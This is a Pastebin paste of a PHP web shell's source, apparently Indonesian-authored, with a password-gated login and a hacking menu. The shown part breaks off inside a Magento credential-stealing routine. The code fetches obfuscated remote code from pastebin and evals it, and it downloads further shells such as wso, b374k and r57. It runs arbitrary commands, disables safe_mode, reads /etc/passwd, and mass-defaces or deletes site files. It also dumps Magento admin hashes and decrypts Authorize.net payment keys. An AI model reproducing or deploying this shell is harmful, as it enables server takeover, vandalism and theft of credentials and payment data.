Guest User

Untitled

a guest
Dec 22nd, 2018
1,135
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 225.38 KB | None | 0 0
  1. <?php
  2. @session_start();
  3. @error_reporting(0);
  4. @error_log(0);
  5. @ini_set('error_log',NULL);
  6. @ini_set('log_errors',0);
  7. @ini_set('max_execution_time',0);
  8. @ini_set('output_buffering',0);
  9. @ini_set('display_errors', 0);
  10. @set_time_limit(0);
  11. @set_magic_quotes_runtime(0);
  12. $lol="505491fab103b4993f4215a3947d0ab3";
  13. function printLogin() {
  14. ?>
  15. <html>
  16. <head>
  17. <title>Login</title>
  18. <link href='https://image.ibb.co/eJgpw6/kiw.png' rel='icon' type='image/x-icon'/>
  19. <meta name='author' content='ikiw'>
  20. <meta charset="UTF-8">
  21. <style type='text/css'>
  22. @import url(https://fonts.googleapis.com/css?family=Mirza);
  23. html {
  24. background: #000000;
  25. color: #ffffff;
  26. font-family: 'Mirza';
  27. font-size: 13px;
  28. width: 100%;
  29. }
  30. input[type=text], input[type=password],input[type=submit] {
  31. background: transparent;
  32. color: #ffffff;
  33. text-align: center;
  34. border: 1px solid red;
  35. margin: 5px auto;
  36. padding-left: 5px;
  37. font-family: 'Mirza';
  38. font-size: 13px;
  39. }
  40. </style>
  41. <style type="text/css">
  42. .pulseit{display:inline-block;-webkit-animation:pound .4s infinite;animation:pound .4s infinite;}
  43. @keyframes pound {from {transform:none;}50% {transform:scale(1.3);}to
  44. {transform:none;}}
  45. </style>
  46. </head>
  47. <style>
  48. input { margin:0;background-color:#fff;border:1px solid #fff; }
  49. </style>
  50. <center><br><br><br><br><br><br><br><br> <img src=http://image.ibb.co/i2dqyH/kiw.png class=pulseit width=220px></img></center><center><br><br>
  51. <form method=post>
  52. <input type=password name=IdiotBlackHat>
  53. </form></center>
  54. <?php
  55. eval(gzinflate(base64_decode(file_get_contents('http://pastebin.com/raw/6PJ9Pj8F'))));
  56. exit;
  57. }
  58. if( !isset( $_SESSION[md5($_SERVER['HTTP_HOST'])] ))
  59. if( empty( $lol ) ||
  60. ( isset( $_POST['IdiotBlackHat'] ) && ( md5($_POST['IdiotBlackHat']) == $lol ) ) )
  61. $_SESSION[md5($_SERVER['HTTP_HOST'])] = true;
  62. else
  63. printLogin();
  64. if(isset($_GET['file']) && ($_GET['file'] != '') && ($_GET['act'] == 'download')) {
  65. @ob_clean();
  66. $file = $_GET['file'];
  67. header('Content-Description: File Transfer');
  68. header('Content-Type: application/octet-stream');
  69. header('Content-Disposition: attachment; filename="'.basename($file).'"');
  70. header('Expires: 0');
  71. header('Cache-Control: must-revalidate');
  72. header('Pragma: public');
  73. header('Content-Length: ' . filesize($file));
  74. readfile($file);
  75. exit;
  76. }
  77.  
  78. ?>
  79. <html>
  80. <head>
  81. <title>.:: WELCOME ::.</title>
  82. <link href='https://image.ibb.co/eJgpw6/kiw.png' rel='icon' type='image/x-icon'/>
  83. <meta name='author' content='ikiw'>
  84. <meta charset="UTF-8">
  85. <style type='text/css'>
  86. @import url(https://fonts.googleapis.com/css?family=Mirza);
  87. html {
  88. background-color: black;
  89. background-size: cover;
  90. color: #ffffff;
  91. font-family: 'Mirza';
  92. font-size: 13px;
  93. width: 100%;
  94. }
  95. li {
  96. display: inline;
  97. margin: 5px;
  98. padding: 5px;
  99. }
  100. table, th, td {
  101. border-collapse:collapse;
  102. font-family: Tahoma, Geneva, sans-serif;
  103. background: transparent;
  104. font-family: 'Mirza';
  105. font-size: 13px;
  106. }
  107. .table_home, .td_home {
  108. border: 1px solid #ffffff;
  109. }
  110. .th_home {
  111. border: 1px solid red;
  112. }
  113. th {
  114. padding: 10px;
  115. }
  116. a {
  117. color: #ffffff;
  118. text-decoration: none;
  119. }
  120. a:hover {
  121. color: lime;
  122. text-decoration: underline;
  123. }
  124. b {
  125. color: gold;
  126. }
  127. input[type=text], input[type=password],input[type=submit] {
  128. background: transparent;
  129. color: #ffffff;
  130. border: 1px solid #ffffff;
  131. margin: 5px auto;
  132. font-family: 'Mirza';
  133. font-size: 13px;
  134. }
  135. textarea {
  136. border: 1px solid #ffffff;
  137. width: 100%;
  138. height: 400px;
  139. padding-left: 5px;
  140. margin: 10px auto;
  141. resize: none;
  142. background: transparent;
  143. color: #ffffff;
  144. font-family: 'Mirza';
  145. font-size: 13px;
  146. }
  147. select {
  148. background: transparent;
  149. color: #ffffff;
  150. border: 1px solid #ffffff;
  151. margin: 5px auto;
  152. padding-left: 5px;
  153. font-family: 'Mirza';
  154. font-size: 13px;
  155. }
  156. .but {
  157. background: transparent;
  158. color: #ffffff;
  159. border: 1px solid #ffffff;
  160. margin: 5px auto;
  161. padding-left: 5px;
  162. font-family: 'Mirza';
  163. font-size: 13px;
  164. }
  165. </style>
  166. </head>
  167. <?php
  168. if (file_exists("php.ini")){
  169. }else{
  170. $img = fopen('php.ini', 'w');
  171. $sec = "safe_mode = OFF
  172. disable_funtions = NONE";
  173. fwrite($img ,$sec);
  174. fclose($img);}
  175. function w($McSl0vv,$perm) {
  176. if(!is_writable($McSl0vv)) {
  177. return "<font color=red>".$perm."</font>";
  178. } else {
  179. return "<font color=lime>".$perm."</font>";
  180. }
  181. }
  182. function UrlLoop($url,$type){
  183.  
  184. $urlArray = array();
  185.  
  186. $ch = curl_init();
  187. curl_setopt($ch, CURLOPT_URL, $url);
  188. curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
  189. $result = curl_exec($ch);
  190.  
  191. $regex='|<a.*?href="(.*?)"|';
  192. preg_match_all($regex,$result,$parts);
  193. $links=$parts[1];
  194. foreach($links as $link){
  195. array_push($urlArray, $link);
  196. }
  197. curl_close($ch);
  198.  
  199. foreach($urlArray as $value){
  200. $lol="$url$value";
  201. if(preg_match("#$type#is", $lol)) {
  202. echo "$lol\r\n";
  203. }
  204. }
  205. }
  206. function exe($cmd) {
  207. if(function_exists('system')) {
  208. @ob_start();
  209. @system($cmd);
  210. $buff = @ob_get_contents();
  211. @ob_end_clean();
  212. return $buff;
  213. } elseif(function_exists('exec')) {
  214. @exec($cmd,$results);
  215. $buff = "";
  216. foreach($results as $result) {
  217. $buff .= $result;
  218. } return $buff;
  219. } elseif(function_exists('passthru')) {
  220. @ob_start();
  221. @passthru($cmd);
  222. $buff = @ob_get_contents();
  223. @ob_end_clean();
  224. return $buff;
  225. } elseif(function_exists('shell_exec')) {
  226. $buff = @shell_exec($cmd);
  227. return $buff;
  228. }
  229. }
  230. function perms($file){
  231. $perms = fileperms($file);
  232. if (($perms & 0xC000) == 0xC000) {
  233. $info = 's';
  234. } elseif (($perms & 0xA000) == 0xA000) {
  235. $info = 'l';
  236. } elseif (($perms & 0x8000) == 0x8000) {
  237. $info = '-';
  238. } elseif (($perms & 0x6000) == 0x6000) {
  239. $info = 'b';
  240. } elseif (($perms & 0x4000) == 0x4000) {
  241. $info = 'd';
  242. } elseif (($perms & 0x2000) == 0x2000) {
  243. $info = 'c';
  244. } elseif (($perms & 0x1000) == 0x1000) {
  245. $info = 'p';
  246. } else {
  247. $info = 'u';
  248. }
  249. $info .= (($perms & 0x0100) ? 'r' : '-');
  250. $info .= (($perms & 0x0080) ? 'w' : '-');
  251. $info .= (($perms & 0x0040) ?
  252. (($perms & 0x0800) ? 's' : 'x' ) :
  253. (($perms & 0x0800) ? 'S' : '-'));
  254. $info .= (($perms & 0x0020) ? 'r' : '-');
  255. $info .= (($perms & 0x0010) ? 'w' : '-');
  256. $info .= (($perms & 0x0008) ?
  257. (($perms & 0x0400) ? 's' : 'x' ) :
  258. (($perms & 0x0400) ? 'S' : '-'));
  259. $info .= (($perms & 0x0004) ? 'r' : '-');
  260. $info .= (($perms & 0x0002) ? 'w' : '-');
  261. $info .= (($perms & 0x0001) ?
  262. (($perms & 0x0200) ? 't' : 'x' ) :
  263. (($perms & 0x0200) ? 'T' : '-'));
  264. return $info;
  265. }
  266. function hdd($s) {
  267. if($s >= 1073741824)
  268. return sprintf('%1.2f',$s / 1073741824 ).' GB';
  269. elseif($s >= 1048576)
  270. return sprintf('%1.2f',$s / 1048576 ) .' MB';
  271. elseif($s >= 1024)
  272. return sprintf('%1.2f',$s / 1024 ) .' KB';
  273. else
  274. return $s .' B';
  275. }
  276. function ambilKata($param, $kata1, $kata2){
  277. if(strpos($param, $kata1) === FALSE) return FALSE;
  278. if(strpos($param, $kata2) === FALSE) return FALSE;
  279. $start = strpos($param, $kata1) + strlen($kata1);
  280. $end = strpos($param, $kata2, $start);
  281. $return = substr($param, $start, $end - $start);
  282. return $return;
  283. }
  284. if(get_magic_quotes_gpc()) {
  285. function idx_ss($array) {
  286. return is_array($array) ? array_map('idx_ss', $array) : stripslashes($array);
  287. }
  288. $_POST = idx_ss($_POST);
  289. }
  290. function CreateTools($names,$lokasi){
  291. if ( $_GET['create'] == $names ){
  292. $a= "".$_SERVER['SERVER_NAME']."";
  293. $b= dirname($_SERVER['PHP_SELF']);
  294. $c = "/McSl0vv_Tools/".$names.".php";
  295. if (file_exists('McSl0vv_Tools/'.$names.'.php')){
  296. echo '<script type="text/javascript">alert("Done");window.location.href = "McSl0vv_Tools/'.$names.'.php";</script> ';
  297. }
  298. else {mkdir("McSl0vv_Tools", 0777);
  299. file_put_contents('McSl0vv_Tools/'.$names.'.php', file_get_contents($lokasi));
  300. echo ' <script type="text/javascript">alert("Done");window.location.href = "McSl0vv_Tools/'.$names.'.php";</script> ';}}}
  301.  
  302. CreateTools("wso","http://pastebin.com/raw/3eh3Gej2");
  303. CreateTools("adminer"."https://www.adminer.org/static/download/4.2.5/adminer-4.2.5.php");
  304. CreateTools("b374k","http://pastebin.com/raw/rZiyaRGV");
  305. CreateTools("injection","http://pastebin.com/raw/nxxL8c1f");
  306. CreateTools("promailerv2","http://pastebin.com/raw/Rk9v6eSq");
  307. CreateTools("gamestopceker","http://pastebin.com/raw/QSnw1JXV");
  308. CreateTools("bukapalapak","http://pastebin.com/raw/6CB8krDi");
  309. CreateTools("tokopedia","http://pastebin.com/dvhzWgby");
  310. CreateTools("encodedecode","http://pastebin.com/raw/wqB3G5eZ");
  311. CreateTools("mailer","http://pastebin.com/raw/9yu1DmJj");
  312. CreateTools("r57","http://pastebin.com/raw/G2VEDunW");
  313. CreateTools("tokenpp","http://pastebin.com/raw/72xgmtPL");
  314. CreateTools("extractor","http://pastebin.com/raw/jQnMFHBL");
  315. CreateTools("bh","http://pastebin.com/raw/3L2ESWeu");
  316. CreateTools("dhanus","http://pastebin.com/raw/v4xGus6X");
  317. if(isset($_GET['McSl0vv'])) {
  318. $McSl0vv = $_GET['McSl0vv'];
  319. chdir($_GET['McSl0vv']);
  320. } else {
  321. $McSl0vv = getcwd();
  322. }
  323. $McSl0vv = str_replace("\\","/",$McSl0vv);
  324. $scdir = explode("/", $McSl0vv);
  325. $sm = (@ini_get(strtolower("safe_mode")) == 'on') ? "<font color=red>AKTIF</font>" : "<font color=lime>NONAKTIF</font>";
  326. $ling="http://".$_SERVER['SERVER_NAME']."".$_SERVER['PHP_SELF']."?create";
  327. $ds = @ini_get("disable_functions");
  328. $mysql = (function_exists('mysql_connect')) ? "<font color=lime>ON</font>" : "<font color=red>OFF</font>";
  329. $curl = (function_exists('curl_version')) ? "<font color=lime>ON</font>" : "<font color=red>OFF</font>";
  330. $wget = (exe('wget --help')) ? "<font color=lime>ON</font>" : "<font color=red>OFF</font>";
  331. $perl = (exe('perl --help')) ? "<font color=lime>ON</font>" : "<font color=red>OFF</font>";
  332. $python = (exe('python --help')) ? "<font color=lime>ON</font>" : "<font color=red>OFF</font>";
  333. $show_ds = (!empty($ds)) ? "<font color=red>$ds</font>" : "<font color=lime>NONE</font>";
  334. if(!function_exists('posix_getegid')) {
  335. $user = @get_current_user();
  336. $uid = @getmyuid();
  337. $gid = @getmygid();
  338. $group = "?";
  339. } else {
  340. $uid = @posix_getpwuid(posix_geteuid());
  341. $gid = @posix_getgrgid(posix_getegid());
  342. $user = $uid['name'];
  343. $uid = $uid['uid'];
  344. $group = $gid['name'];
  345. $gid = $gid['gid'];
  346. }
  347. $d0mains = @file("/etc/named.conf");
  348. $users=@file('/etc/passwd');
  349. if($d0mains)
  350. {
  351. $count;
  352. foreach($d0mains as $d0main)
  353. {
  354. if(@ereg("zone",$d0main))
  355. {
  356. preg_match_all('#zone "(.*)"#', $d0main, $domains);
  357. flush();
  358. if(strlen(trim($domains[1][0])) > 2)
  359. {
  360. flush();
  361. $count++;
  362. }
  363. }
  364. }
  365. }
  366.  
  367. $sport=$_SERVER['SERVER_PORT'];
  368. echo "<table style='width:100%'>";
  369. echo "<tr><td>System: <font color=lime>".php_uname()."</font></td></tr>";
  370. echo "<tr><td>User: <font color=lime>".$user."</font> (".$uid.") Group: <font color=lime>".$group."</font> (".$gid.")</td></tr>";
  371. echo "<tr><td>IP server: <font color=lime>".gethostbyname($_SERVER['HTTP_HOST'])."</font> | IP lu: <font color=lime>".$_SERVER['REMOTE_ADDR']."</font></td></tr>";
  372. echo "<tr><td>HDD: <font color=lime>".hdd(disk_free_space("/"))."</font> / <font color=lime>".hdd(disk_total_space("/"))."</font></td></tr>";
  373. echo "<tr><td>Total Ada :<font color=lime> $count </font> Domain</td></tr>";
  374. echo "<tr><td>Port :<font color=lime> $sport</font> </td></tr>";
  375. echo "<tr><td>Mode Aman: $sm</td></tr>";
  376. echo "<tr><td>Disable Functions: $show_ds</td></tr>";
  377.  
  378. echo "<tr><td>MySQL: $mysql | Perl: $perl | Python: $python | WGET: $wget | CURL: $curl </td></tr>";
  379. echo "<tr><td>Lokasi Lu: ";
  380. foreach($scdir as $c_dir => $cdir) {
  381. echo "<a href='?McSl0vv=";
  382. for($i = 0; $i <= $c_dir; $i++) {
  383. echo $scdir[$i];
  384. if($i != $c_dir) {
  385. echo "/";
  386. }
  387. }
  388. echo "'>$cdir</a>/";
  389. }
  390. echo "<tr><td><form method='post' action='?McSl0vv=$McSl0vv&ikiw=cmd'>
  391. Pembantu :
  392. <input type='text' size='30' height='10' name='cmd'><input type='submit' name='do_cmd' value='>>'>
  393. </form></td></tr>";
  394. echo "</table><hr>";
  395. echo "<center>";
  396. echo "<ul>";
  397. echo "<li><font color=red>[ <a href='?'>Home</a> ]</li>";
  398. echo "<li><font color=red>[ <a href='?McSl0vv=$McSl0vv&ikiw=upload'>Upload</a> ]</li>";
  399. echo "<li><font color=red>[ <a href='?McSl0vv=$McSl0vv&ikiw=cmd'>Command</a> ]</li>";
  400. echo "<li><font color=red>[ <a href='?McSl0vv=$McSl0vv&ikiw=mass_deface'>Mass Deface</a> ]</li>";
  401. echo "<li><font color=red>[ <a href='?McSl0vv=$McSl0vv&ikiw=config'>Config</a> ]</li>";
  402. echo "<li><font color=red>[ <a href='?McSl0vv=$McSl0vv&ikiw=symconfig'>Config 2</a> ]</li>";
  403. echo "<li><font color=red>[ <a href='?McSl0vv=$McSl0vv&ikiw=jumping'>Jumping</a> ]</li>";
  404. echo "<li><font color=red>[ <a href='?McSl0vv=$McSl0vv&ikiw=symlink'>Symlink</a> ]<br></li>";
  405. echo "<li><font color=red>[ <a href='?McSl0vv=$McSl0vv&ikiw=cpanel'>cPanel Crack</a> ]</li>";
  406. echo "<li><font color=red>[ <a href='?McSl0vv=$McSl0vv&ikiw=cpftp_auto'>CPanel/FTP Auto Deface</a> ]</li>";
  407. echo "<li><font color=red>[ <a href='?McSl0vv=$McSl0vv&ikiw=smtp'>SMTP Graber</a> ]</li>";
  408. echo "<li><font color=red>[ <a href='?McSl0vv=$McSl0vv&ikiw=zoneh'>Zone-H</a> ]</li>";
  409. echo "<li><font color=red>[ <a href='?McSl0vv=$McSl0vv&ikiw=defacerid'>Defacer.ID</a> ]</li>";
  410. echo "<li><font color=red>[ <a href='?McSl0vv=$McSl0vv&ikiw=cgi'>CGI Telnet</a> ]</li><br>";
  411. echo "<li><font color=red>[ <a href='?McSl0vv=$McSl0vv&ikiw=adminer'>Adminer</a> ]</li>";
  412. echo "<li><font color=red>[ <a href='?McSl0vv=$McSl0vv&ikiw=fake_root'>Fake Root</a> ]</li>";
  413. echo "<li><font color=red>[ <a href='?McSl0vv=$McSl0vv&ikiw=auto_edit_user'>Auto Edit User</a> ]</li>";
  414. echo "<li><font color=red>[ <a href='?McSl0vv=$McSl0vv&ikiw=auto_wp'>Auto Edit Title WordPress</a> ]</li>";
  415. echo "<li><font color=red>[ <a href='?McSl0vv=$McSl0vv&ikiw=auto_dwp'>WP Auto Deface</a> ]</li>";
  416. echo "<li><font color=red>[ <a href='?McSl0vv=$McSl0vv&ikiw=auto_dwp2'>WP Auto Deface V.2</a> ]</li>";
  417. echo "<li><font color=red>[ <a href='?McSl0vv=$McSl0vv&ikiw=auto_cu_wp'>WP Auto Edit User V.2</a> ]</li>";
  418. echo "<li><font color=red>[ <a href='?McSl0vv=$McSl0vv&ikiw=auto_cu_joomla'>Joomla Auto Edit User V.2</a> ]</li>";
  419. echo "<li><font color=red>[ <a href='?McSl0vv=$McSl0vv&ikiw=passwbypass'>Bypass etc/passw</a> ]<br></li>";
  420. echo "<li><font color=red>[ <a href='?McSl0vv=$McSl0vv&ikiw=loghunter'>Log Hunter</a> ]</li>";
  421. echo "<li><font color=red>[ <a href='?McSl0vv=$McSl0vv&ikiw=shellchk'>Shell Checker</a> ]</li>";
  422. echo "<li><font color=red>[ <a href='?McSl0vv=$McSl0vv&ikiw=shelscan'>Shell Finder</a> ]</li>";
  423. echo "<li><font color=red>[ <a href='?McSl0vv=$McSl0vv&ikiw=zip'>Zip Menu</a> ]</li>";
  424. echo "<li><font color=red>[ <a href='?McSl0vv=$McSl0vv&ikiw=about'>About</a> ]</li>";
  425. echo "<li><font color=red>[ <a href='?McSl0vv=$McSl0vv&ikiw=magen'>Magento DB Info</a> ]</li><br>";
  426. echo "<li><font color=red>[ <a href='?McSl0vv=$McSl0vv&ikiw=metu'>Keluar</a> ]<br><font color=white></li>";
  427. echo "</ul>";
  428. echo "</center>";
  429. echo "<hr>";
  430. if($_GET['ikiw'] == 'upload') {
  431. echo "<center>";
  432. if($_POST['upload']) {
  433. if(@copy($_FILES['ix_file']['tmp_name'], "$McSl0vv/".$_FILES['ix_file']['name']."")) {
  434. $act = "<font color=lime>Gud berhasil</font> at <i><b>$McSl0vv/".$_FILES['ix_file']['name']."</b></i>";
  435. } else {
  436. $act = "<font color=red>Gagal asw:(</font>";
  437. }
  438. }
  439. echo "Upload : [ ".w($McSl0vv,"Writeable")." ]<form method='post' enctype='multipart/form-data'><input type='file' name='ix_file'><input type='submit' value='upload' name='upload'></form>";
  440. echo $act;
  441. echo "</center>";
  442. }
  443. elseif($_GET['ikiw'] == 'cmd') {
  444. if($_POST['do_cmd']) {
  445. echo "<pre>".exe($_POST['cmd'])."</pre>";
  446. }
  447. } elseif($_GET['ikiw'] == 'mass_deface') {
  448. echo "<center><form action=\"\" method=\"post\">\n";
  449. $McSl0vvr=$_POST['d_dir'];
  450. $index = $_POST["script"];
  451. $index = str_replace('"',"'",$index);
  452. $index = stripslashes($index);
  453. function edit_file($file,$index){
  454. if (is_writable($file)) {
  455. clear_fill($file,$index);
  456. echo "<Span style='color:green;'><strong> [ + ] Sukses Kakak</strong></span><br></center>";
  457. }
  458. else {
  459. echo "<Span style='color:red;'><strong> [ - ] Gagal njir:(</strong></span><br></center>";
  460. }
  461. }
  462. function hapus_massal($McSl0vv,$namafile) {
  463. if(is_writable($McSl0vv)) {
  464. $McSl0vva = scandir($McSl0vv);
  465. foreach($McSl0vva as $McSl0vvb) {
  466. $McSl0vvc = "$McSl0vv/$McSl0vvb";
  467. $lokasi = $McSl0vvc.'/'.$namafile;
  468. if($McSl0vvb === '.') {
  469. if(file_exists("$McSl0vv/$namafile")) {
  470. unlink("$McSl0vv/$namafile");
  471. }
  472. } elseif($McSl0vvb === '..') {
  473. if(file_exists("".dirname($McSl0vv)."/$namafile")) {
  474. unlink("".dirname($McSl0vv)."/$namafile");
  475. }
  476. } else {
  477. if(is_dir($McSl0vvc)) {
  478. if(is_writable($McSl0vvc)) {
  479. if(file_exists($lokasi)) {
  480. echo "[<font color=lime>TERHAPUS:v</font>] $lokasi<br>";
  481. unlink($lokasi);
  482. $idx = hapus_massal($McSl0vvc,$namafile);
  483. }
  484. }
  485. }
  486. }
  487. }
  488. }
  489. }
  490. function clear_fill($file,$index){
  491. if(file_exists($file)){
  492. $handle = fopen($file,'w');
  493. fwrite($handle,'');
  494. fwrite($handle,$index);
  495. fclose($handle); } }
  496.  
  497. function gass(){
  498. global $McSl0vvr , $index ;
  499. chdir($McSl0vvr);
  500. $me = str_replace(dirname(__FILE__).'/','',__FILE__);
  501. $files = scandir($McSl0vvr) ;
  502. $notallow = array(".htaccess","error_log","_vti_inf.html","_private","_vti_bin","_vti_cnf","_vti_log","_vti_pvt","_vti_txt","cgi-bin",".contactemail",".cpanel",".fantasticodata",".htpasswds",".lastlogin","access-logs","cpbackup-exclude-used-by-backup.conf",".cgi_auth",".disk_usage",".statspwd","..",".");
  503. sort($files);
  504. $n = 0 ;
  505. foreach ($files as $file){
  506. if ( $file != $me && is_dir($file) != 1 && !in_array($file, $notallow) ) {
  507. echo "<center><Span style='color: #8A8A8A;'><strong>$McSl0vvr/</span>$file</strong> ====> ";
  508. edit_file($file,$index);
  509. flush();
  510. $n = $n +1 ;
  511. }
  512. }
  513. echo "<br>";
  514. echo "<center><br><h3>Total Mantan $n</h3></center><br>";
  515. }
  516. function ListFiles($McSl0vvrall) {
  517.  
  518. if($dh = opendir($McSl0vvrall)) {
  519.  
  520. $files = Array();
  521. $inner_files = Array();
  522. $me = str_replace(dirname(__FILE__).'/','',__FILE__);
  523. $notallow = array($me,".htaccess","error_log","_vti_inf.html","_private","_vti_bin","_vti_cnf","_vti_log","_vti_pvt","_vti_txt","cgi-bin",".contactemail",".cpanel",".fantasticodata",".htpasswds",".lastlogin","access-logs","cpbackup-exclude-used-by-backup.conf",".cgi_auth",".disk_usage",".statspwd","Thumbs.db");
  524. while($file = readdir($dh)) {
  525. if($file != "." && $file != ".." && $file[0] != '.' && !in_array($file, $notallow) ) {
  526. if(is_dir($McSl0vvrall . "/" . $file)) {
  527. $inner_files = ListFiles($McSl0vvrall . "/" . $file);
  528. if(is_array($inner_files)) $files = array_merge($files, $inner_files);
  529. } else {
  530. array_push($files, $McSl0vvrall . "/" . $file);
  531. }
  532. }
  533. }
  534.  
  535. closedir($dh);
  536. return $files;
  537. }
  538. }
  539. function gass_all(){
  540. global $index ;
  541. $McSl0vvrall=$_POST['d_dir'];
  542. foreach (ListFiles($McSl0vvrall) as $key=>$file){
  543. $file = str_replace('//',"/",$file);
  544. echo "<center><strong>$file</strong> ===>";
  545. edit_file($file,$index);
  546. flush();
  547. }
  548. $key = $key+1;
  549. echo "<center><br><h3>Total Mantan $key</h3></center><br>"; }
  550. function sabun_massal($McSl0vv,$namafile,$isi_script) {
  551. if(is_writable($McSl0vv)) {
  552. $McSl0vva = scandir($McSl0vv);
  553. foreach($McSl0vva as $McSl0vvb) {
  554. $McSl0vvc = "$McSl0vv/$McSl0vvb";
  555. $lokasi = $McSl0vvc.'/'.$namafile;
  556. if($McSl0vvb === '.') {
  557. file_put_contents($lokasi, $isi_script);
  558. } elseif($McSl0vvb === '..') {
  559. file_put_contents($lokasi, $isi_script);
  560. } else {
  561. if(is_dir($McSl0vvc)) {
  562. if(is_writable($McSl0vvc)) {
  563. echo "[<font color=lime>DONE</font>] $lokasi<br>";
  564. file_put_contents($lokasi, $isi_script);
  565. $idx = sabun_massal($McSl0vvc,$namafile,$isi_script);
  566. }
  567. }
  568. }
  569. }
  570. }
  571. }
  572. if($_POST['mass'] == 'onedir') {
  573. echo "<br> Versi Text Area<br><textarea style='background:black;outline:none;color:red;' name='index' rows='10' cols='67'>\n";
  574. $ini="http://";
  575. $mainpath=$_POST[d_dir];
  576. $file=$_POST[d_file];
  577. $McSl0vv=opendir("$mainpath");
  578. $code=base64_encode($_POST[script]);
  579. $indx=base64_decode($code);
  580. while($row=readdir($McSl0vv)){
  581. $start=@fopen("$row/$file","w+");
  582. $finish=@fwrite($start,$indx);
  583. if ($finish){
  584. echo"$ini$row/$file\n";
  585. }
  586. }
  587. echo "</textarea><br><br><br><b>Versi Text</b><br><br><br>\n";
  588. $mainpath=$_POST[d_dir];$file=$_POST[d_file];
  589. $McSl0vv=opendir("$mainpath");
  590. $code=base64_encode($_POST[script]);
  591. $indx=base64_decode($code);
  592. while($row=readdir($McSl0vv)){$start=@fopen("$row/$file","w+");
  593. $finish=@fwrite($start,$indx);
  594. if ($finish){echo '<a href="http://' . $row . '/' . $file . '" target="_blank">http://' . $row . '/' . $file . '</a><br>'; }
  595. }
  596.  
  597. }
  598. elseif($_POST['mass'] == 'sabunkabeh') { gass(); }
  599. elseif($_POST['mass'] == 'hapusmassal') { hapus_massal($_POST['d_dir'], $_POST['d_file']); }
  600. elseif($_POST['mass'] == 'sabunmematikan') { gass_all(); }
  601. elseif($_POST['mass'] == 'massdeface') {
  602. echo "<div style='margin: 5px auto; padding: 5px'>";
  603. sabun_massal($_POST['d_dir'], $_POST['d_file'], $_POST['script']);
  604. echo "</div>"; }
  605. else {
  606. echo "
  607. <center><font style='text-decoration: underline;'>
  608. Select Type:<br>
  609. </font>
  610. <select class=\"select\" name=\"mass\" style=\"width: 450px;\" height=\"10\">
  611. <option value=\"onedir\">Deface Masal 1 DIR</option>
  612. <option value=\"massdeface\">Deface Masal Semua DIR</option>
  613. <option value=\"sabunkabeh\">Brutallity ditempat</option>
  614. <option value=\"sabunmematikan\">Brutality Semua</option>
  615. <option value=\"hapusmassal\">Hapus Masal</option></center></select><br>
  616. <font style='text-decoration: underline;'>Folder:</font><br>
  617. <input type='text' name='d_dir' value='$McSl0vv' style='width: 450px;' height='10'><br>
  618. <font style='text-decoration: underline;'>Filename:</font><br>
  619. <input type='text' name='d_file' value='index.php' style='width: 450px;' height='10'><br>
  620. <font style='text-decoration: underline;'>Index File:</font><br>
  621. <textarea name='script' style='width: 450px; height: 200px;'>Hacked By McSl0vv</textarea><br>
  622. <input type='submit' name='start' value='Mass Deface' style='width: 450px;'>
  623. </form></center>";
  624. }
  625. }
  626. elseif($_GET['ikiw'] == 'magen') {
  627. echo'
  628. <div id="page-wrap">
  629. <center>
  630. <br>
  631. <FORM action="" method="post">
  632. <div align="center">[M A G E N T O] - Stealing Information<br>
  633. <div align="center">Recoder: Ikiw<br>
  634. <input type="hidden" name="form_action" value="2">
  635. </div>
  636. </div>
  637. ';
  638.  
  639.  
  640. if(file_exists($_SERVER['DOCUMENT_ROOT'].'/app/etc/local.xml')){
  641. $xml = simplexml_load_file($_SERVER['DOCUMENT_ROOT'].'/app/etc/local.xml');
  642. if(isset($xml->global->resources->default_setup->connection)) {
  643. $connection = $xml->global->resources->default_setup->connection;
  644. $prefix = $xml->global->resources->db->table_prefix;
  645. $key = $xml->global->crypt->key; //f8cd1881e3bf20108d5f4947e60acfc1
  646. require_once $_SERVER['DOCUMENT_ROOT'].'/app/Mage.php';
  647.  
  648. try {
  649. $app = Mage::app('default');
  650. Mage::getSingleton('core/session', array('name'=>'frontend'));
  651. }catch(Exception $e) { echo 'Message: ' .$e->getMessage()."<br/>\n";}
  652.  
  653. if (!mysql_connect($connection->host, $connection->username, $connection->password)){
  654. print("Could not connect: " . mysql_error());
  655. }
  656. mysql_select_db($connection->dbname);
  657. echo $connection->host."|".$connection->username."|".$connection->password."|".$connection->dbname."| $prefix | $key<br/>\n";
  658.  
  659. $crypto = new Varien_Crypt_Mcrypt();
  660. $crypto->init($key);
  661.  
  662. //=========================================================================================================
  663. $query = mysql_query("SELECT user_id,firstname,lastname,email,username,password FROM admin_user where is_active = '1'");
  664. if (!$query){
  665. echo "<center><b>Gagal</b></center>";
  666. }else{
  667. $site = mysql_fetch_array(mysql_query("SELECT value as website FROM core_config_data WHERE path='web/unsecure/base_url'"));
  668. echo'<br><br>
  669. ====================================================================<br>
  670. [ Admin FROM website : '.$site['website'].'] <br>
  671. ====================================================================<br>';
  672. }
  673. echo "
  674. <table border='1' align='center' >
  675. <tr>
  676. <td>id</td>
  677. <td>firstname</td>
  678. <td>lastname</td>
  679. <td>email</td>
  680. <td>username</td>
  681. <td>password</td>
  682. </tr>";
  683. while($vx = mysql_fetch_array($query)) {
  684. $no = 1;
  685. $user_id = $vx['user_id'];
  686. $username = $vx['username'];
  687. $password = $vx['password'];
  688. $email = $vx['email'];
  689. $firstname = $vx['firstname'];
  690. $lastname = $vx['lastname'];
  691. echo "<tr><pre><td>$user_id</td><td>$firstname</td><td>$lastname</td><td>$email</td><td>$username</td><td>$password</td></pre></tr>";
  692. }
  693. echo "</table><br>";
  694. //=========================================================================================================
  695. $query = mysql_query("SELECT value as user,(SELECT value FROM core_config_data where path = 'payment/authorizenet/trans_key') as pass FROM core_config_data where path = 'payment/authorizenet/login'");
  696. if(mysql_num_rows($query) != 0){
  697. if (!$query){
  698. echo "<center><b>Gagal</b></center>";
  699. }else{
  700. echo'<br><br>
  701. ====================================================================<br>
  702. [ Authorizenet ] <br>
  703. ====================================================================<br>';
  704. }
  705. echo "
  706. <table border='1' align='center' >
  707. <tr>
  708. <td>no</td>
  709. <td>user</td>
  710. <td>pass</td>
  711. </tr>";
  712. $no = 1;
  713. while($vx = mysql_fetch_array($query)) {
  714. $user = $crypto->decrypt($vx['user']);
  715. $pass = $crypto->decrypt($vx['pass']);
  716.  
  717.  
  718. echo "<tr><pre><td>$no</td><td>$user</td><td>$pass</td></pre></tr>";
  719. $no++;
  720. }
  721. echo "</table><br>";
  722. }
  723. //=========================================================================================================
